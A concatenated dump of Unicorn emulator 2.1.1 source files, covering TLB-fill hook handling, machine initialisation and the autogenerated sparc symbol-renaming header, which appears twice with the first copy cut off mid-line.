            list->last_mapping = memory_mapping;
            return;
        }
    }

    /* this region cannot be merged into any existing memory mapping */
    create_new_memory_mapping(list, phys_addr, virt_addr, length);
}

unicorn-2.1.1/qemu/softmmu/unicorn_vtlb.c

#include <stdint.h>
#include "qemu/osdep.h"
#include "qemu-common.h"
#include "exec/exec-all.h"
#include "uc_priv.h"

#include <stdio.h>

static void raise_mmu_exception(CPUState *cs, target_ulong address, int rw, uintptr_t retaddr)
{
    cs->uc->invalid_error = UC_ERR_EXCEPTION;
    cs->uc->invalid_addr = address;
    cpu_exit(cs->uc->cpu);
    cpu_loop_exit_restore(cs, retaddr);
}

static uc_mem_type rw_to_mem_type(int rw)
{
    switch (rw) {
    case MMU_DATA_LOAD:
        return UC_MEM_READ;
    case MMU_DATA_STORE:
        return UC_MEM_WRITE;
    case MMU_INST_FETCH:
        return UC_MEM_FETCH;
    default:
        return UC_MEM_READ;
    }
}

static int perms_to_prot(int perms)
{
    int ret = 0;
    if (perms & UC_PROT_READ) {
        ret |= PAGE_READ;
    }
    if (perms & UC_PROT_WRITE) {
        ret |= PAGE_WRITE;
    }
    if (perms & UC_PROT_EXEC) {
        ret |= PAGE_EXEC;
    }
    return ret;
}

bool unicorn_fill_tlb(CPUState *cs, vaddr address, int size, MMUAccessType rw, int mmu_idx, bool probe, uintptr_t retaddr)
{
    bool handled = false;
    bool ret = false;
    struct uc_struct *uc = cs->uc;
    uc_tlb_entry e;
    struct hook *hook;
    HOOK_FOREACH_VAR_DECLARE;

    HOOK_FOREACH(uc, hook, UC_HOOK_TLB_FILL) {
        if (hook->to_delete) {
            continue;
        }
        if
 (!HOOK_BOUND_CHECK(hook, address)) {
            continue;
        }
        handled = true;
        JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_tlbevent_t)hook->callback)(uc, address & TARGET_PAGE_MASK, rw_to_mem_type(rw), &e, hook->user_data));
        if (ret) {
            break;
        }
    }

    if (handled && !ret) {
        goto tlb_miss;
    }

    if (!handled) {
        e.paddr = address & TARGET_PAGE_MASK;
        switch (rw) {
        case MMU_DATA_LOAD:
            e.perms = UC_PROT_READ;
            break;
        case MMU_DATA_STORE:
            e.perms = UC_PROT_WRITE;
            break;
        case MMU_INST_FETCH:
            e.perms = UC_PROT_EXEC;
            break;
        default:
            e.perms = 0;
            break;
        }
    }

    switch (rw) {
    case MMU_DATA_LOAD:
        ret = e.perms & UC_PROT_READ;
        break;
    case MMU_DATA_STORE:
        ret = e.perms & UC_PROT_WRITE;
        break;
    case MMU_INST_FETCH:
        ret = e.perms & UC_PROT_EXEC;
        break;
    default:
        ret = false;
        break;
    }

    if (ret) {
        tlb_set_page(cs, address & TARGET_PAGE_MASK, e.paddr & TARGET_PAGE_MASK, perms_to_prot(e.perms), mmu_idx, TARGET_PAGE_SIZE);
        return true;
    }

tlb_miss:
    if (probe) {
        return false;
    }
    raise_mmu_exception(cs, address, rw, retaddr);
    return false;
}

unicorn-2.1.1/qemu/softmmu/vl.c

/*
 * QEMU System Emulator
 *
 * Copyright (c) 2003-2008 Fabrice Bellard
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#include "sysemu/sysemu.h"
#include "sysemu/cpus.h"
#include "uc_priv.h"

void init_real_host_page_size(struct uc_struct *uc);
void init_cache_info(struct uc_struct *uc);

DEFAULT_VISIBILITY
int machine_initialize(struct uc_struct *uc)
{
    init_get_clock();

    /* Init uc->qemu_real_host_page_size. */
    init_real_host_page_size(uc);

    /* Init uc->qemu_icache_linesize. */
    init_cache_info(uc);

    // Initialize arch specific.
    uc->init_arch(uc);

    /* Init memory. */
    uc->cpu_exec_init_all(uc);

    uc->target_page(uc);

    /* Init tcg. use DEFAULT_CODE_GEN_BUFFER_SIZE. */
    uc->tcg_exec_init(uc, uc->tcg_buffer_size);

    /* Init cpu. use default cpu_model.
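 * (Passing a NULL cpu_model here selects the architecture's default CPU.)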
*/
    return uc->cpus_init(uc, NULL);
}

void qemu_system_reset_request(struct uc_struct* uc)
{
    cpu_stop(uc);
}

void qemu_system_shutdown_request(struct uc_struct *uc)
{
    /* TODO: shutdown (exit program) immediately? */
    cpu_stop(uc);
}

unicorn-2.1.1/qemu/sparc.h

/* Autogen header for Unicorn Engine - DO NOT MODIFY */
#ifndef UNICORN_AUTOGEN_sparc_H
#define UNICORN_AUTOGEN_sparc_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _sparc
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_sparc
#define reg_read reg_read_sparc
#define reg_write reg_write_sparc
#define uc_init uc_init_sparc
#define uc_add_inline_hook uc_add_inline_hook_sparc
#define uc_del_inline_hook uc_del_inline_hook_sparc
#define tb_invalidate_phys_range tb_invalidate_phys_range_sparc
#define use_idiv_instructions use_idiv_instructions_sparc
#define arm_arch arm_arch_sparc
#define tb_target_set_jmp_target tb_target_set_jmp_target_sparc
#define have_bmi1 have_bmi1_sparc
#define have_popcnt have_popcnt_sparc
#define have_avx1 have_avx1_sparc
#define have_avx2 have_avx2_sparc
#define have_isa have_isa_sparc
#define have_altivec have_altivec_sparc
#define have_vsx have_vsx_sparc
#define flush_icache_range flush_icache_range_sparc
#define s390_facilities s390_facilities_sparc
#define tcg_dump_op tcg_dump_op_sparc
#define tcg_dump_ops tcg_dump_ops_sparc
#define tcg_gen_and_i64 tcg_gen_and_i64_sparc
#define tcg_gen_discard_i64 tcg_gen_discard_i64_sparc
#define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_sparc
#define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_sparc
#define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_sparc
#define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_sparc
#define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_sparc
#define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_sparc
#define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc
#define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc
#define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc
#define tcg_gen_mul_i64 tcg_gen_mul_i64_sparc
#define tcg_gen_or_i64 tcg_gen_or_i64_sparc
#define tcg_gen_sar_i64 tcg_gen_sar_i64_sparc
#define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc
#define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc
#define tcg_gen_st_i64 tcg_gen_st_i64_sparc
#define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc
#define cpu_icount_to_ns cpu_icount_to_ns_sparc
#define cpu_is_stopped cpu_is_stopped_sparc
#define cpu_get_ticks cpu_get_ticks_sparc
#define cpu_get_clock cpu_get_clock_sparc
#define cpu_resume cpu_resume_sparc
#define qemu_init_vcpu qemu_init_vcpu_sparc
#define cpu_stop_current cpu_stop_current_sparc
#define resume_all_vcpus resume_all_vcpus_sparc
#define vm_start vm_start_sparc
#define
unicorn-2.1.1/qemu/sparc.h

/* Autogen header for Unicorn Engine - DONOT MODIFY */
#ifndef UNICORN_AUTOGEN_sparc_H
#define UNICORN_AUTOGEN_sparc_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _sparc
#endif
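/*
 * Unicorn compiles every supported target from the same QEMU-derived
 * sources and links them into one library, so each target build renames
 * every global symbol with an arch postfix to avoid collisions; the list
 * below is the mechanical result for sparc. A sketch of the idea using
 * reg_read (the token-pasting helper shown is illustrative, not part of
 * this header):
 *
 *     #define xglue(x, y) x ## y
 *     #define glue(x, y) xglue(x, y)
 *     // glue(reg_read, UNICORN_ARCH_POSTFIX) expands to reg_read_sparc
 *
 * Shared code keeps calling reg_read(); in the sparc objects the plain
 * #define below makes that call resolve to reg_read_sparc().
 */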
#define unicorn_fill_tlb unicorn_fill_tlb_sparc
#define reg_read reg_read_sparc
#define reg_write reg_write_sparc
#define uc_init uc_init_sparc
#define uc_add_inline_hook uc_add_inline_hook_sparc
#define uc_del_inline_hook uc_del_inline_hook_sparc
#define tb_invalidate_phys_range tb_invalidate_phys_range_sparc
#define use_idiv_instructions use_idiv_instructions_sparc
#define arm_arch arm_arch_sparc
#define tb_target_set_jmp_target tb_target_set_jmp_target_sparc
#define have_bmi1 have_bmi1_sparc
#define have_popcnt have_popcnt_sparc
#define have_avx1 have_avx1_sparc
#define have_avx2 have_avx2_sparc
#define have_isa have_isa_sparc
#define have_altivec have_altivec_sparc
#define have_vsx have_vsx_sparc
#define flush_icache_range flush_icache_range_sparc
#define s390_facilities s390_facilities_sparc
#define tcg_dump_op tcg_dump_op_sparc
#define tcg_dump_ops tcg_dump_ops_sparc
#define tcg_gen_and_i64 tcg_gen_and_i64_sparc
#define tcg_gen_discard_i64 tcg_gen_discard_i64_sparc
#define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_sparc
#define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_sparc
#define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_sparc
#define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_sparc
#define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_sparc
#define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_sparc
#define tcg_gen_ld_i64 tcg_gen_ld_i64_sparc
#define tcg_gen_mov_i64 tcg_gen_mov_i64_sparc
#define tcg_gen_movi_i64 tcg_gen_movi_i64_sparc
#define tcg_gen_mul_i64 tcg_gen_mul_i64_sparc
#define tcg_gen_or_i64 tcg_gen_or_i64_sparc
#define tcg_gen_sar_i64 tcg_gen_sar_i64_sparc
#define tcg_gen_shl_i64 tcg_gen_shl_i64_sparc
#define tcg_gen_shr_i64 tcg_gen_shr_i64_sparc
#define tcg_gen_st_i64 tcg_gen_st_i64_sparc
#define tcg_gen_xor_i64 tcg_gen_xor_i64_sparc
#define cpu_icount_to_ns cpu_icount_to_ns_sparc
#define cpu_is_stopped cpu_is_stopped_sparc
#define cpu_get_ticks cpu_get_ticks_sparc
#define cpu_get_clock cpu_get_clock_sparc
#define cpu_resume cpu_resume_sparc
#define qemu_init_vcpu qemu_init_vcpu_sparc
#define cpu_stop_current cpu_stop_current_sparc
#define resume_all_vcpus resume_all_vcpus_sparc
#define vm_start vm_start_sparc
#define address_space_dispatch_compact address_space_dispatch_compact_sparc
#define flatview_translate flatview_translate_sparc
#define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc
#define qemu_get_cpu qemu_get_cpu_sparc
#define cpu_address_space_init cpu_address_space_init_sparc
#define cpu_get_address_space cpu_get_address_space_sparc
#define cpu_exec_unrealizefn cpu_exec_unrealizefn_sparc
#define cpu_exec_initfn cpu_exec_initfn_sparc
#define cpu_exec_realizefn cpu_exec_realizefn_sparc
#define tb_invalidate_phys_addr tb_invalidate_phys_addr_sparc
#define cpu_watchpoint_insert cpu_watchpoint_insert_sparc
#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc
#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc
#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc
#define cpu_breakpoint_insert cpu_breakpoint_insert_sparc
#define cpu_breakpoint_remove cpu_breakpoint_remove_sparc
#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc
#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc
#define cpu_abort cpu_abort_sparc
#define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_sparc
#define memory_region_section_get_iotlb memory_region_section_get_iotlb_sparc
#define flatview_add_to_dispatch flatview_add_to_dispatch_sparc
#define qemu_ram_get_host_addr qemu_ram_get_host_addr_sparc
#define qemu_ram_get_offset qemu_ram_get_offset_sparc
#define qemu_ram_get_used_length qemu_ram_get_used_length_sparc
#define qemu_ram_is_shared qemu_ram_is_shared_sparc
#define qemu_ram_pagesize qemu_ram_pagesize_sparc
#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_sparc
#define qemu_ram_alloc qemu_ram_alloc_sparc
#define qemu_ram_free qemu_ram_free_sparc
#define qemu_map_ram_ptr qemu_map_ram_ptr_sparc
#define qemu_ram_block_host_offset qemu_ram_block_host_offset_sparc
#define qemu_ram_block_from_host qemu_ram_block_from_host_sparc
#define qemu_ram_addr_from_host qemu_ram_addr_from_host_sparc
#define cpu_check_watchpoint cpu_check_watchpoint_sparc
#define iotlb_to_section iotlb_to_section_sparc
#define address_space_dispatch_new address_space_dispatch_new_sparc
#define address_space_dispatch_free address_space_dispatch_free_sparc
#define flatview_read_continue flatview_read_continue_sparc
#define address_space_read_full address_space_read_full_sparc
#define address_space_write address_space_write_sparc
#define address_space_rw address_space_rw_sparc
#define cpu_physical_memory_rw cpu_physical_memory_rw_sparc
#define address_space_write_rom address_space_write_rom_sparc
#define cpu_flush_icache_range cpu_flush_icache_range_sparc
#define cpu_exec_init_all cpu_exec_init_all_sparc
#define address_space_access_valid address_space_access_valid_sparc
#define address_space_map address_space_map_sparc
#define address_space_unmap address_space_unmap_sparc
#define cpu_physical_memory_map cpu_physical_memory_map_sparc
#define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc
#define cpu_memory_rw_debug cpu_memory_rw_debug_sparc
#define qemu_target_page_size qemu_target_page_size_sparc
#define qemu_target_page_bits qemu_target_page_bits_sparc
#define qemu_target_page_bits_min qemu_target_page_bits_min_sparc
#define target_words_bigendian target_words_bigendian_sparc
#define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc
#define ram_block_discard_range ram_block_discard_range_sparc
#define ramblock_is_pmem ramblock_is_pmem_sparc
#define page_size_init page_size_init_sparc
#define set_preferred_target_page_bits set_preferred_target_page_bits_sparc
#define finalize_target_page_bits finalize_target_page_bits_sparc
#define cpu_outb cpu_outb_sparc
#define cpu_outw cpu_outw_sparc
#define cpu_outl cpu_outl_sparc
#define cpu_inb cpu_inb_sparc
#define cpu_inw cpu_inw_sparc
#define cpu_inl cpu_inl_sparc
#define memory_map memory_map_sparc
#define memory_map_io memory_map_io_sparc
#define memory_map_ptr memory_map_ptr_sparc
#define memory_cow memory_cow_sparc
#define memory_unmap memory_unmap_sparc
#define memory_moveout memory_moveout_sparc
#define memory_movein memory_movein_sparc
#define memory_free memory_free_sparc
#define flatview_unref flatview_unref_sparc
#define address_space_get_flatview address_space_get_flatview_sparc
#define memory_region_transaction_begin memory_region_transaction_begin_sparc
#define memory_region_transaction_commit memory_region_transaction_commit_sparc
#define memory_region_init memory_region_init_sparc
#define memory_region_access_valid memory_region_access_valid_sparc
#define memory_region_dispatch_read memory_region_dispatch_read_sparc
#define memory_region_dispatch_write memory_region_dispatch_write_sparc
#define memory_region_init_io memory_region_init_io_sparc
#define memory_region_init_ram_ptr memory_region_init_ram_ptr_sparc
#define memory_region_size memory_region_size_sparc
#define memory_region_set_readonly memory_region_set_readonly_sparc
#define memory_region_get_ram_ptr memory_region_get_ram_ptr_sparc
#define memory_region_from_host memory_region_from_host_sparc
#define memory_region_get_ram_addr memory_region_get_ram_addr_sparc
#define memory_region_add_subregion memory_region_add_subregion_sparc
#define memory_region_del_subregion memory_region_del_subregion_sparc
#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_sparc
#define memory_region_find memory_region_find_sparc
#define memory_region_filter_subregions memory_region_filter_subregions_sparc
#define memory_listener_register memory_listener_register_sparc
#define memory_listener_unregister memory_listener_unregister_sparc
#define address_space_remove_listeners address_space_remove_listeners_sparc
#define address_space_init address_space_init_sparc
#define address_space_destroy address_space_destroy_sparc
#define memory_region_init_ram memory_region_init_ram_sparc
#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_sparc
#define find_memory_mapping find_memory_mapping_sparc
#define exec_inline_op exec_inline_op_sparc
#define floatx80_default_nan floatx80_default_nan_sparc
#define float_raise float_raise_sparc
#define float16_is_quiet_nan float16_is_quiet_nan_sparc
#define float16_is_signaling_nan float16_is_signaling_nan_sparc
#define float32_is_quiet_nan float32_is_quiet_nan_sparc
#define float32_is_signaling_nan float32_is_signaling_nan_sparc
#define float64_is_quiet_nan float64_is_quiet_nan_sparc
#define float64_is_signaling_nan float64_is_signaling_nan_sparc
#define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc
#define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc
#define floatx80_silence_nan floatx80_silence_nan_sparc
#define propagateFloatx80NaN propagateFloatx80NaN_sparc
#define float128_is_quiet_nan float128_is_quiet_nan_sparc
#define float128_is_signaling_nan float128_is_signaling_nan_sparc
#define float128_silence_nan float128_silence_nan_sparc
#define float16_add float16_add_sparc
#define float16_sub float16_sub_sparc
#define float32_add float32_add_sparc
#define float32_sub float32_sub_sparc #define float64_add float64_add_sparc #define float64_sub float64_sub_sparc #define float16_mul float16_mul_sparc #define float32_mul float32_mul_sparc #define float64_mul float64_mul_sparc #define float16_muladd float16_muladd_sparc #define float32_muladd float32_muladd_sparc #define float64_muladd float64_muladd_sparc #define float16_div float16_div_sparc #define float32_div float32_div_sparc #define float64_div float64_div_sparc #define float16_to_float32 float16_to_float32_sparc #define float16_to_float64 float16_to_float64_sparc #define float32_to_float16 float32_to_float16_sparc #define float32_to_float64 float32_to_float64_sparc #define float64_to_float16 float64_to_float16_sparc #define float64_to_float32 float64_to_float32_sparc #define float16_round_to_int float16_round_to_int_sparc #define float32_round_to_int float32_round_to_int_sparc #define float64_round_to_int float64_round_to_int_sparc #define float16_to_int16_scalbn float16_to_int16_scalbn_sparc #define float16_to_int32_scalbn float16_to_int32_scalbn_sparc #define float16_to_int64_scalbn float16_to_int64_scalbn_sparc #define float32_to_int16_scalbn float32_to_int16_scalbn_sparc #define float32_to_int32_scalbn float32_to_int32_scalbn_sparc #define float32_to_int64_scalbn float32_to_int64_scalbn_sparc #define float64_to_int16_scalbn float64_to_int16_scalbn_sparc #define float64_to_int32_scalbn float64_to_int32_scalbn_sparc #define float64_to_int64_scalbn float64_to_int64_scalbn_sparc #define float16_to_int16 float16_to_int16_sparc #define float16_to_int32 float16_to_int32_sparc #define float16_to_int64 float16_to_int64_sparc #define float32_to_int16 float32_to_int16_sparc #define float32_to_int32 float32_to_int32_sparc #define float32_to_int64 float32_to_int64_sparc #define float64_to_int16 float64_to_int16_sparc #define float64_to_int32 float64_to_int32_sparc #define float64_to_int64 float64_to_int64_sparc #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_sparc #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_sparc #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_sparc #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc #define float16_to_uint16_scalbn float16_to_uint16_scalbn_sparc #define float16_to_uint32_scalbn float16_to_uint32_scalbn_sparc #define float16_to_uint64_scalbn float16_to_uint64_scalbn_sparc #define float32_to_uint16_scalbn float32_to_uint16_scalbn_sparc #define float32_to_uint32_scalbn float32_to_uint32_scalbn_sparc #define float32_to_uint64_scalbn float32_to_uint64_scalbn_sparc #define float64_to_uint16_scalbn float64_to_uint16_scalbn_sparc #define float64_to_uint32_scalbn float64_to_uint32_scalbn_sparc #define float64_to_uint64_scalbn float64_to_uint64_scalbn_sparc #define float16_to_uint16 float16_to_uint16_sparc #define float16_to_uint32 float16_to_uint32_sparc #define float16_to_uint64 float16_to_uint64_sparc #define float32_to_uint16 float32_to_uint16_sparc #define float32_to_uint32 float32_to_uint32_sparc #define float32_to_uint64 float32_to_uint64_sparc #define float64_to_uint16 float64_to_uint16_sparc 
#define float64_to_uint32 float64_to_uint32_sparc #define float64_to_uint64 float64_to_uint64_sparc #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_sparc #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_sparc #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_sparc #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc #define int64_to_float16_scalbn int64_to_float16_scalbn_sparc #define int32_to_float16_scalbn int32_to_float16_scalbn_sparc #define int16_to_float16_scalbn int16_to_float16_scalbn_sparc #define int64_to_float16 int64_to_float16_sparc #define int32_to_float16 int32_to_float16_sparc #define int16_to_float16 int16_to_float16_sparc #define int64_to_float32_scalbn int64_to_float32_scalbn_sparc #define int32_to_float32_scalbn int32_to_float32_scalbn_sparc #define int16_to_float32_scalbn int16_to_float32_scalbn_sparc #define int64_to_float32 int64_to_float32_sparc #define int32_to_float32 int32_to_float32_sparc #define int16_to_float32 int16_to_float32_sparc #define int64_to_float64_scalbn int64_to_float64_scalbn_sparc #define int32_to_float64_scalbn int32_to_float64_scalbn_sparc #define int16_to_float64_scalbn int16_to_float64_scalbn_sparc #define int64_to_float64 int64_to_float64_sparc #define int32_to_float64 int32_to_float64_sparc #define int16_to_float64 int16_to_float64_sparc #define uint64_to_float16_scalbn uint64_to_float16_scalbn_sparc #define uint32_to_float16_scalbn uint32_to_float16_scalbn_sparc #define uint16_to_float16_scalbn uint16_to_float16_scalbn_sparc #define uint64_to_float16 uint64_to_float16_sparc #define uint32_to_float16 uint32_to_float16_sparc #define uint16_to_float16 uint16_to_float16_sparc #define uint64_to_float32_scalbn uint64_to_float32_scalbn_sparc #define uint32_to_float32_scalbn uint32_to_float32_scalbn_sparc #define uint16_to_float32_scalbn uint16_to_float32_scalbn_sparc #define uint64_to_float32 uint64_to_float32_sparc #define uint32_to_float32 uint32_to_float32_sparc #define uint16_to_float32 uint16_to_float32_sparc #define uint64_to_float64_scalbn uint64_to_float64_scalbn_sparc #define uint32_to_float64_scalbn uint32_to_float64_scalbn_sparc #define uint16_to_float64_scalbn uint16_to_float64_scalbn_sparc #define uint64_to_float64 uint64_to_float64_sparc #define uint32_to_float64 uint32_to_float64_sparc #define uint16_to_float64 uint16_to_float64_sparc #define float16_min float16_min_sparc #define float16_minnum float16_minnum_sparc #define float16_minnummag float16_minnummag_sparc #define float16_max float16_max_sparc #define float16_maxnum float16_maxnum_sparc #define float16_maxnummag float16_maxnummag_sparc #define float32_min float32_min_sparc #define float32_minnum float32_minnum_sparc #define float32_minnummag float32_minnummag_sparc #define float32_max float32_max_sparc #define float32_maxnum float32_maxnum_sparc #define float32_maxnummag float32_maxnummag_sparc #define float64_min float64_min_sparc #define float64_minnum float64_minnum_sparc #define float64_minnummag float64_minnummag_sparc #define float64_max float64_max_sparc #define float64_maxnum 
float64_maxnum_sparc #define float64_maxnummag float64_maxnummag_sparc #define float16_compare float16_compare_sparc #define float16_compare_quiet float16_compare_quiet_sparc #define float32_compare float32_compare_sparc #define float32_compare_quiet float32_compare_quiet_sparc #define float64_compare float64_compare_sparc #define float64_compare_quiet float64_compare_quiet_sparc #define float16_scalbn float16_scalbn_sparc #define float32_scalbn float32_scalbn_sparc #define float64_scalbn float64_scalbn_sparc #define float16_sqrt float16_sqrt_sparc #define float32_sqrt float32_sqrt_sparc #define float64_sqrt float64_sqrt_sparc #define float16_default_nan float16_default_nan_sparc #define float32_default_nan float32_default_nan_sparc #define float64_default_nan float64_default_nan_sparc #define float128_default_nan float128_default_nan_sparc #define float16_silence_nan float16_silence_nan_sparc #define float32_silence_nan float32_silence_nan_sparc #define float64_silence_nan float64_silence_nan_sparc #define float16_squash_input_denormal float16_squash_input_denormal_sparc #define float32_squash_input_denormal float32_squash_input_denormal_sparc #define float64_squash_input_denormal float64_squash_input_denormal_sparc #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_sparc #define roundAndPackFloatx80 roundAndPackFloatx80_sparc #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_sparc #define int32_to_floatx80 int32_to_floatx80_sparc #define int32_to_float128 int32_to_float128_sparc #define int64_to_floatx80 int64_to_floatx80_sparc #define int64_to_float128 int64_to_float128_sparc #define uint64_to_float128 uint64_to_float128_sparc #define float32_to_floatx80 float32_to_floatx80_sparc #define float32_to_float128 float32_to_float128_sparc #define float32_rem float32_rem_sparc #define float32_exp2 float32_exp2_sparc #define float32_log2 float32_log2_sparc #define float32_eq float32_eq_sparc #define float32_le float32_le_sparc #define float32_lt float32_lt_sparc #define float32_unordered float32_unordered_sparc #define float32_eq_quiet float32_eq_quiet_sparc #define float32_le_quiet float32_le_quiet_sparc #define float32_lt_quiet float32_lt_quiet_sparc #define float32_unordered_quiet float32_unordered_quiet_sparc #define float64_to_floatx80 float64_to_floatx80_sparc #define float64_to_float128 float64_to_float128_sparc #define float64_rem float64_rem_sparc #define float64_log2 float64_log2_sparc #define float64_eq float64_eq_sparc #define float64_le float64_le_sparc #define float64_lt float64_lt_sparc #define float64_unordered float64_unordered_sparc #define float64_eq_quiet float64_eq_quiet_sparc #define float64_le_quiet float64_le_quiet_sparc #define float64_lt_quiet float64_lt_quiet_sparc #define float64_unordered_quiet float64_unordered_quiet_sparc #define floatx80_to_int32 floatx80_to_int32_sparc #define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc #define floatx80_to_int64 floatx80_to_int64_sparc #define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc #define floatx80_to_float32 floatx80_to_float32_sparc #define floatx80_to_float64 floatx80_to_float64_sparc #define floatx80_to_float128 floatx80_to_float128_sparc #define floatx80_round floatx80_round_sparc #define floatx80_round_to_int floatx80_round_to_int_sparc #define floatx80_add floatx80_add_sparc #define floatx80_sub floatx80_sub_sparc #define floatx80_mul floatx80_mul_sparc #define floatx80_div floatx80_div_sparc #define floatx80_rem floatx80_rem_sparc 
#define floatx80_sqrt floatx80_sqrt_sparc #define floatx80_eq floatx80_eq_sparc #define floatx80_le floatx80_le_sparc #define floatx80_lt floatx80_lt_sparc #define floatx80_unordered floatx80_unordered_sparc #define floatx80_eq_quiet floatx80_eq_quiet_sparc #define floatx80_le_quiet floatx80_le_quiet_sparc #define floatx80_lt_quiet floatx80_lt_quiet_sparc #define floatx80_unordered_quiet floatx80_unordered_quiet_sparc #define float128_to_int32 float128_to_int32_sparc #define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc #define float128_to_int64 float128_to_int64_sparc #define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc #define float128_to_uint64 float128_to_uint64_sparc #define float128_to_uint64_round_to_zero float128_to_uint64_round_to_zero_sparc #define float128_to_uint32_round_to_zero float128_to_uint32_round_to_zero_sparc #define float128_to_uint32 float128_to_uint32_sparc #define float128_to_float32 float128_to_float32_sparc #define float128_to_float64 float128_to_float64_sparc #define float128_to_floatx80 float128_to_floatx80_sparc #define float128_round_to_int float128_round_to_int_sparc #define float128_add float128_add_sparc #define float128_sub float128_sub_sparc #define float128_mul float128_mul_sparc #define float128_div float128_div_sparc #define float128_rem float128_rem_sparc #define float128_sqrt float128_sqrt_sparc #define float128_eq float128_eq_sparc #define float128_le float128_le_sparc #define float128_lt float128_lt_sparc #define float128_unordered float128_unordered_sparc #define float128_eq_quiet float128_eq_quiet_sparc #define float128_le_quiet float128_le_quiet_sparc #define float128_lt_quiet float128_lt_quiet_sparc #define float128_unordered_quiet float128_unordered_quiet_sparc #define floatx80_compare floatx80_compare_sparc #define floatx80_compare_quiet floatx80_compare_quiet_sparc #define float128_compare float128_compare_sparc #define float128_compare_quiet float128_compare_quiet_sparc #define floatx80_scalbn floatx80_scalbn_sparc #define float128_scalbn float128_scalbn_sparc #define softfloat_init softfloat_init_sparc #define tcg_optimize tcg_optimize_sparc #define gen_new_label gen_new_label_sparc #define tcg_can_emit_vec_op tcg_can_emit_vec_op_sparc #define tcg_expand_vec_op tcg_expand_vec_op_sparc #define tcg_register_jit tcg_register_jit_sparc #define tcg_tb_insert tcg_tb_insert_sparc #define tcg_tb_remove tcg_tb_remove_sparc #define tcg_tb_lookup tcg_tb_lookup_sparc #define tcg_tb_foreach tcg_tb_foreach_sparc #define tcg_nb_tbs tcg_nb_tbs_sparc #define tcg_region_reset_all tcg_region_reset_all_sparc #define tcg_region_init tcg_region_init_sparc #define tcg_code_size tcg_code_size_sparc #define tcg_code_capacity tcg_code_capacity_sparc #define tcg_tb_phys_invalidate_count tcg_tb_phys_invalidate_count_sparc #define tcg_malloc_internal 